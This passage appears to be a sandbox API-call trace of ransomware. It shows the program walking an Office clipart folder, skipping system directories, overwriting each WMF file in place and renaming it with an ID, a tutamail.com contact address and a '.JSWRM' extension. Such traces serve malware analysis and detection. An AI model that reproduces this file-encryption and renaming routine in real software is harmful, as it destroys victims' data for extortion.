lpString2=".") returned 1 [0093.202] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="..") returned 1 [0093.202] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="...") returned 1 [0093.202] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="windows") returned -1 [0093.202] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="recovery") returned -1 [0093.203] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="perflogs") returned -1 [0093.203] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="documents and settings") returned 1 [0093.203] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.203] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="system volume information") returned -1 [0093.203] lstrcmpiW (lpString1="PE02282_.WMF", lpString2="msocache") returned 1 [0093.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02282_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02282_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02282_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0093.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02282_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02282_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02282_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0093.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.203] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29696) returned 1 [0093.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7400) returned 0x24d210 [0093.204] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7400, lpOverlapped=0x0) returned 1 [0093.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.207] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7400, lpOverlapped=0x0) returned 1 [0093.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.209] CloseHandle (hObject=0x314) returned 1 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0093.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0093.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.209] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0093.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.210] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02285_.WMF", cAlternateFileName="")) returned 1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2=".") returned 1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="..") returned 1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="...") returned 1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="windows") returned -1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="recovery") returned -1 [0093.210] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="perflogs") returned -1 [0093.211] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="documents and settings") returned 1 [0093.211] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.211] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="system volume information") returned -1 [0093.211] lstrcmpiW (lpString1="PE02285_.WMF", lpString2="msocache") returned 1 [0093.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02285_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02285_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02285_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02285_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02285_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02285_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0093.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0093.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.211] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16528) returned 1 [0093.211] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4090) returned 0x24d210 [0093.212] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4090, lpOverlapped=0x0) returned 1 [0093.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.230] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4090, lpOverlapped=0x0) returned 1 [0093.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.230] CloseHandle (hObject=0x314) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0093.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0093.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.230] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.231] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4584, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02287_.WMF", cAlternateFileName="")) returned 1 [0093.231] lstrcmpiW (lpString1="PE02287_.WMF", lpString2=".") returned 1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="..") returned 1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="...") returned 1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="windows") returned -1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="recovery") returned -1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="perflogs") returned -1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="documents and settings") returned 1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="system volume information") returned -1 [0093.232] lstrcmpiW (lpString1="PE02287_.WMF", lpString2="msocache") returned 1 [0093.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02287_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02287_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02287_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0093.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02287_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02287_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02287_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0093.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.233] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17796) returned 1 [0093.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4580) returned 0x24d210 [0093.233] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4580, lpOverlapped=0x0) returned 1 [0093.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.236] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4580, lpOverlapped=0x0) returned 1 [0093.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.236] CloseHandle (hObject=0x314) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0093.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0093.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0093.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0093.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.237] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02288_.WMF", cAlternateFileName="")) returned 1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2=".") returned 1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="..") returned 1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="...") returned 1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="windows") returned -1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="recovery") returned -1 [0093.237] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="perflogs") returned -1 [0093.238] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="documents and settings") returned 1 [0093.238] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.238] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="system volume information") returned -1 [0093.238] lstrcmpiW (lpString1="PE02288_.WMF", lpString2="msocache") returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02288_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02288_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02288_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02288_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02288_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02288_.WMF", lpUsedDefaultChar=0x0) returned 12 